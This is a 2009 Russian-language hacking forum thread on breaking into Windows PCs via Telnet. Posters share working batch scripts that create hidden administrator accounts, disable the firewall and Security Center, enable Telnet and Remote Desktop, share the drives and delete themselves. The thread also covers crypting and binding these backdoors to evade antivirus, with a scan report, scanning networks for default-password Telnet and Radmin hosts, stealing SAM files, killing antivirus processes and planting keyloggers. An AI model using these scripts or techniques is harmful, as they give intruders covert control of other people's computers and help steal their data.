RE: Взлом через Telnet
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Взлом через Telnet - 2009-04-03 23:01:22.090000
|
|
|
Duhas
Сообщений: 125
Оценки: 0
Присоединился: 2009-03-12 16:33:18.890000
|
quote:
ORIGINAL: Matios
А можешь дать нормальный исходник, чтобы точно знать, что прокатит? просто больше шансов на передачу не будит((
Нашел такое. в сети проканало на ура! Проверил, и на внешке тоже катит на ура!!!
@echo off
Chcp 1251
net user Админ 1234 /add > nul
net localgroup Администраторы Админ /add > nul
net localgroup "Пользователи удаленного рабочего стола" Админ /add > nul
cd %systemroot%
@echo Windows Registry Editor Version 5.00 > tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> tmp.reg
@echo "Админ"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> tmp.reg
@echo "forceguest"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> tmp.reg
@echo "fAllowToGetHelp"=dword:00000000 >> tmp.reg
@echo "fDenyTSConnections"=dword:00000000 >> tmp.reg
regedit /s %SystemRoot%\tmp.reg /y
sc stop wscsvc > nul
sc stop SharedAccess > nul
sc config wscsvc start= disabled > nul
sc config SharedAccess start= disabled > nul
sc config tlntsvr start= auto > nul
sc config termservice start= auto > nul
sc start tlntsvr > nul
sc start termservice > nul
cd %systemroot%
del tmp.reg
net share disk_c=c: > nul
net share disk_d=d: > nul
del %0
Ты взял в тупую собрал кучу батников в кучу и что получил в итоге?!
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-07 18:56:34.410000
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
Возник вопрос допустим мы на компе жертвы и вошли под учеткой какую мы создали. Тут писали что типа она видна при перезагрузке. А если попробовать пока жертва не перезагрузилась стырить у нее SAM, потом стереть нашу палевную учетку и сидеть уже под пользователем жертвы??
+ еше можно попробовать переименовать процесс tlntsrv на какойнибуть другой??
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-07 22:21:58.343333
|
|
|
Duhas
Сообщений: 125
Оценки: 0
Присоединился: 2009-03-12 16:33:18.890000
|
Проще это все дело в автозагрузку прописать после залить файлы Radmin'a и сидеть себе как королю…:)
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-07 22:45:30.343333
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
не палевно ли будет что процесс радмина запущен будет??
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 11:13:19.253333
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
Покапался в инете и нашел во такую фишку "netsh firewall add portopening" открытие пора в брандмауэре как думаете норм будет если батник вот такой с учетом того что на компе жертвы не установлено другого антивир ПО кроме стандартного виндосвкого
chcp 1251
net user 1 123456 /add
net localgroup Администраторы 1 /add
netsh firewall add portopening TCP 972 System
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 13:53:46.750000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Парни,как мне прописать batник в автозагрузку…
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 15:02:02.530000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
griffis,спс[sm=az.gif]
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 18:34:31.410000
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
Что значит,когда входишь по телнету,появляется строка
router>
Что это????????????
Точнее что с этим можно сделати,и каким образом??????
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 19:07:21.403333
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Подскажите,когда я спёр пароли от ADSL интернета что мне с ними делать…
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 20:23:51.660000
|
|
|
Rаlf
Сообщений: 408
Оценки: 0
Присоединился: 2008-01-31 23:20:28.036666
|
quote:
ORIGINAL: tohack
Подскажите,когда я спёр пароли от ADSL интернета что мне с ними делать…
1. Подумать, зачем ты это здел.
2. Вспомнить об ответственности в УК.
3. Оценить шансы тебя вычислить
4. Использовать для доступа в интернет через ADSL.
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-08 23:46:11.823333
|
|
|
griffis
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-07 02:26:14.236666
|
quote:
Что значит,когда входишь по телнету,появляется строка
router>
Что это????????????
Точнее что с этим можно сделати,и каким образом??????
ну думаю ты попал в роутер =)
тут глянь может поможет http://ru.wikibooks.org/wiki/%D0%9F%D0%BE%D1%80%D1%82/Router
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-09 01:07:15.373333
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
quote:
ORIGINAL: griffis
quote:
Что значит,когда входишь по телнету,появляется строка
router>
Что это????????????
Точнее что с этим можно сделати,и каким образом??????
ну думаю ты попал в роутер =)
тут глянь может поможет http://ru.wikibooks.org/wiki/%D0%9F%D0%BE%D1%80%D1%82/Router
Спасибо,но не то.Общий принцип я знаю.Не могу найти описаний команд Роутера(модема) например:
sys
etherdbg
dot1q
lan
exit
usb
pktqos
ether
ip
show
wan
bridge
set
Они выходят в стандартном хэлпе.
Проверил sys появились :
adjtime
domainname
hostname
time
syslog
romrest
diag
display
modelcheck
cpu
и другие,все не переписал.Если у кого нибудь есть,или знает ссылку,был бы очень благодарен.Желательно полное описание всех команд,с синтаксисом.С роутерами не связывался,много незнакомого.А в слепую тыкатся не серьёзно.
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-09 01:55:29.206666
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
Такая проблема есть:
Нашёл через поука ИП с открытыми портами, как узнать логин и пасс от телнета???
при заходи через телнет пишет:
welcome to mutant200s
mutant200s login:
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-09 02:17:07.540000
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
quote:
ORIGINAL: krik
Такая проблема есть:
Нашёл через поука ИП с открытыми портами, как узнать логин и пасс от телнета???
при заходи через телнет пишет:
welcome to mutant200s
mutant200s login:
В телнете лимит подключений,брутить неудобно.Пробуй самые распространённые.Это если тебе именно этот IP и и обязательно через телнет.
Если с ОТКРЫТЫМИ ПОРТАМИ попробуй через другие войти.Radmin,Desktop,FTP и прочее.
А вообще по Российским сетям с этим можно и не мучится,берёшь диапазон какой нибудь сетки,сканишь на 23 порт,и открываешь.Если просят логин,то в помойку,если только пасс то вбиваешь 1234 или 12345.
Более 50 процентов,у кого только пас требуется,и подходит стандартный.
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-09 03:28:36.406666
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
спс за идею сканить только 23 порт:)
П.С. уже 1 телнет акк нашёл + на этом же ип фтп акк:)
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-09 12:48:15.660000
|
|
|
VIRUSTAM
Сообщений: 5
Оценки: 0
Присоединился: 2009-03-26 23:25:37.340000
|
Dobrii den uvojaemie Forumci!
Ya vse vrode bi sdelal no u mena nichego nepoluchilos!
Pomogite mne pojalusta!
Naprimer u mena neskolko PC: Est Vita, Xp, 2000 i Server 2003 - 2008.
Ya znayu ihnie IP, Gatway, DNS, Maske.
Ya hochu cherez Vistu na eti kompi zahodit cherez inet vse ostalnie toje podklucheni k inetu.
Kak mne dat link ili chto nado sdelat na etix kompax chtob ya mog zahodit cherez telnet k nim.
Znayu takuyu progu kak SecureCRT esli nujno chto to drugoe podskajite pojalusta.
I eshe u mena odin vopros?
Kak uznovat port.
Gde i kakaya funkciya chtobi uznat port PC
Budu ochen rad! Spasibo vam bolshoe!
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-09 17:50:01.710000
|
|
|
GreatFish
Сообщений: 23
Оценки: 0
Присоединился: 2009-04-06 02:53:03.413333
|
quote:
ORIGINAL: krik
спс за идею сканить только 23 порт:)
П.С. уже 1 телнет акк нашёл + на этом же ип фтп акк:)
Скань лучше 2 хотя бы.23 и 4899.Radmin тоже не редко встречается по дефолту,если тебе очень компы нужны.В принципе,когда очень надо,сканю по ним,за час набирается около 10 по радмину,и штук 20-25 по телнету,если грамотно диапазончик выбирать.
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-23 16:43:36.030000
|
|
|
ka4a
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-24 03:18:51.940000
|
телнет очень сильная штука и не чем не палится. но умный знает что у него запущено
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-24 21:06:55.066666
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
Вот этот прокатил батник
chcp 1251
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 123 /t REG_SZ /d D:\123.vbs /f
start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123" D:\123.vbs
net user 123 191111 /add
net localgroup Администраторы 123 /add
net localgroup Administrators 123 /add
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "123" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Но хотелось бы Подключение к удаленному рабочему столу сделать
Попробывал
chcp 1251
net user cool 191111 /add
net localgroup Администраторы 1234 /add
net localgroup Пользователи удаленного рабочего стола 1234 /add
net accounts /maxpwage:unlimited
net stop sharedaccess
sc config sharedaccess start= disabled
Чет не пашет, в чем проблемма? Как правельно надо сделать?
|
|
|
|
|
RE: Взлом через Telnet - 2009-04-30 21:37:38.773333
|
|
|
NitroM$I
Сообщений: 1
Оценки: 0
Присоединился: 2009-04-30 21:22:32.746666
|
барон сука стучи гнида в асю! 8116328
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-03 05:40:52.423333
|
|
|
XANer
Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
|
ЭЭЭ народ подскажите прогу что бы ломать можна было=))
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-06 09:49:28.960000
|
|
|
SkyNet91
Сообщений: 5
Оценки: 0
Присоединился: 2009-06-06 09:32:07.570000
|
Всем привет у меня такой вопрос я запустил телнет подключился к другому компу и тут спрашивает логин и пароль логин я ввел и пароль не водиться что делать подскажите кто может
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-06 21:00:51.580000
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
пасс вводиться, но неотображается просто из з абезопасности
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-10 05:34:57.320000
|
|
|
XANer
Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
|
ЭЭ people, can u say me wat kind of program do I need to breake telnet???
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-16 16:46:15.510000
|
|
|
Razorich
Сообщений: 5
Оценки: 0
Присоединился: 2009-06-15 22:51:52.910000
|
Народ нужна помощь, такая трабла: внедрил в систему недруга батник (слил с другим файлом и закриптовал как-то О_о) всё идеально работало успел накачать инфы всякой, только вот он засёк админ. запись hacker и скорее всего удалил, порт 972 открыт, можно ли как-нибудь выбить пользователя и пароль его компа? Хотя бы имя [&o]
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-16 22:06:51.683333
|
|
|
Razorich
Сообщений: 5
Оценки: 0
Присоединился: 2009-06-15 22:51:52.910000
|
Хм… странная тенденция, криптованный скомпиленный батник (криптовал pohernah) обнаружается в 37,5% случаев (24 антивируса тестило), а не криптованный в 25%. 8|
Инфа криптованного:
File Info
Report generated: 16.6.2009 at 20.00.53 (GMT 1)
Filename: crush.exe
File size: 64 KB
MD5 Hash: 3F2D697BC884403078F4E4BE574FFBBE
SHA1 Hash: 2B922DFBDE67FC70E7FE049639785C6D8E8C99BC
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 9 on 24
Detections
a-squared - Nothing found!
Avira AntiVir - TR/Dropper.Gen
Avast - Nothing found!
AVG - Win32/PolyCrypt
BitDefender - Packer.Pohernah.D
ClamAV - Nothing found!
Comodo - Heur.Packed.Unknown
Dr.Web - Trojan.Packed.454
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - SuspiciousPacker.Multi.Generic
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Suspicious
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Malware-Cryptor.Win32.Vserafno
Virus Buster - Packed/Pohernah
Scan report generated by
NoVirusThanks.org
|
|
|
|
|
RE: Взлом через Telnet - 2009-06-20 07:03:06.150000
|
|
|
XANer
Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
|
Значит криптовать нада 25 раз =)) если возможно, хотя воврядле
|
|
|
|
|
RE: Взлом через Telnet - 2009-07-31 23:07:38.790000
|
|
|
chenivi
Сообщений: 6
Оценки: 0
Присоединился: 2009-07-30 16:27:15.870000
|
вот тело батника
@echo off
Chcp 1251
net user Админ 1234 /add > nul
net localgroup Администраторы Админ /add > nul
net localgroup "Пользователи удаленного рабочего стола" Админ /add > nul
cd %systemroot%
@echo Windows Registry Editor Version 5.00 > tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> tmp.reg
@echo "Админ"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> tmp.reg
@echo "forceguest"=dword:00000000 >> tmp.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> tmp.reg
@echo "fAllowToGetHelp"=dword:00000000 >> tmp.reg
@echo "fDenyTSConnections"=dword:00000000 >> tmp.reg
regedit /s %SystemRoot%\tmp.reg /y
sc stop wscsvc > nul
sc stop SharedAccess > nul
sc config wscsvc start= disabled > nul
sc config SharedAccess start= disabled > nul
sc config tlntsvr start= auto > nul
sc config termservice start= auto > nul
sc start tlntsvr > nul
sc start termservice > nul
cd %systemroot%
del tmp.reg
net share disk_c=c: > nul
net share disk_d=d: > nul
del %0
когда запускаю его всё работает. а если склеиваеш с каким нибуть файлом он не работает
подскажите в чом причина
|
|
|
|
|
RE: Взлом через Telnet - 2009-08-27 17:51:38.070000
|
|
|
Different
Сообщений: 4
Оценки: 0
Присоединился: 2009-08-25 19:03:50.083333
|
Привет всем, кто меня не знает.
Для запуска Telnet'a, требуется, что б были активные службы: Драйвер протокола TCP/IP –> Драйвер IPSEC;
Поставщик поддержки безопасности NT LM, и УдалённЙы вызов процедур (RPC).
Иначе выпадет сообщение типа: "Не удалось запустить… Error 1068."
В Посте №1 Telnet ставится в автозапуск командой "sc config tlntsvr start= auto".
Как запустить две другие через консоль(.bat). Пробовал запустить NT LM(Lsass.exe) командой sc config lsass start= auto,
в ответ получил плюху, типа [SC] OpenService FAILED 1060:
Кто знает в чём проблема? Всё таки интересТно.
И еще, поексперементируйте с ситемной консолью(Консоль от SYSTEM) на счет убийств антивирей. Вызывается она командой <at 16:41 /interactive "cmd"> вместо 16:41 поставте ваше время+ 1мин.;)
|
|
|
|
|
RE: Взлом через Telnet - 2009-09-06 20:45:38.863333
|
|
|
ro5co
Сообщений: 1
Оценки: 0
Присоединился: 2009-09-06 16:07:58.660000
|
На windows 7 есть поддержка telnet?
По стандартному адресу "c:WINDOWS\system32\telnet.exe" не обнаружил.
|
|
|
|
|
RE: Взлом через Telnet - 2009-10-08 22:27:56.286666
|
|
|
DIMONLE
Сообщений: 24
Оценки: 0
Присоединился: 2008-10-14 20:41:17.220000
|
тоже самое,хотел качнуть файл на чела,но нифига,опытные опишите плз по бырому как залить файл через telnet)
|
|
|
|
|
RE: Взлом через Telnet - 2009-10-24 10:57:02.193333
|
|
|
Morsik!
Сообщений: 150
Оценки: 0
Присоединился: 2009-10-18 14:56:06.430000
|
у меня вопрос а можно отрубить процес компа через телнет?
просто мне надо отключить процессы касперского и dr.web а после удалить их)
а потом я собираюсь кинуть туда кейлогер через радмин
вот такой я злодей):D
|
|
|
|
|
RE: Взлом через Telnet - 2009-10-25 09:41:53.610000
|
|
|
Erika1978
Сообщений: 28
Оценки: 0
Присоединился: 2009-03-07 09:54:10.870000
|
У меня что-то не так получилось,при вводе логина,логин вводится,а при вводе пасса ничего не могу ввести.черточка мигает.но не на одну клавишу не откликается.В чем дело-то?
|
|
|
|
|
RE: Взлом через Telnet - 2009-10-25 15:54:08.640000
|
|
|
scsi.aka.api
Сообщений: 122
Оценки: 0
Присоединился: 2008-07-02 00:58:06.646666
|
есть telnet доступ к деду,но проблема в том что там стоит китайский server 2003
и вот такой bat вылетает с ошибкой
chcp 1251
net user SUPPORT_388945a0 /delete
net user brtn 123 /add
net localgroup Администраторы brtn /add
net localgroup Administrators brtn /add
net localgroup Пользователи SUPPORT_388945a0 /del
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "brtn" /t REG_DWORD /d 0 /f
кто-нибудь знает как создать там новую учётную запись в правами администратора?
|
|
|
|
|
RE: Взлом через Telnet - 2009-10-30 21:16:29.650000
|
|
|
Morsik!
Сообщений: 150
Оценки: 0
Присоединился: 2009-10-18 14:56:06.430000
|
quote:
все доброе время суток !!
помогите пожалуйста… мне нужна команда для батника чтобы завершала процесс касперыча ну и для других антивирусов тоже не помешает…
спасибо всем кто откликнется на мою просьбу…
ну касперский и доктор веб не палит как вир, скомпилированный батник кидал знакомой ,у нее не палил ,а вот у меня аваст ,он мне компилировать не давал приходилось останавливать и компилировать на счет нод 32 незнаю но вроде он 1 и палит,так что если там 1 из этих антивиров не бойся они не спалят и сейчас я проверил авастом он как молчал так и молчит в тряпку)
|
|
|
|
|
RE: Взлом через Telnet - 2009-11-23 13:50:58.566666
|
|
|
nub Nik
Сообщений: 263
Оценки: 0
Присоединился: 2009-11-18 10:53:00.250000
|
Текст был тут взят:
http://www.fssr.ru/hz.php?name=News&file=article&sid=8820
Я уже 2 раз вижу как его от туда копируют, и выдают за свое!
|
|
|
|
|
RE: Взлом через Telnet - 2009-12-13 18:55:50.876666
|
|
|
Xaklog
Сообщений: 12
Оценки: 0
Присоединился: 2009-11-12 10:23:38.660000
|
Ребята подскажите команду чтобы кароче ip адрес чтобы узнать!!!
|
|
|
|
|
RE: Взлом через Telnet - 2009-12-15 11:22:57.640000
|
|
|
manool
Сообщений: 4
Оценки: 0
Присоединился: 2009-12-14 14:17:46.050000
|
всё хорошо идет
ввожу логин
жму Enter
пишет pass
ввожу пароль а ниче не набирается
|
|
|
|
|
|
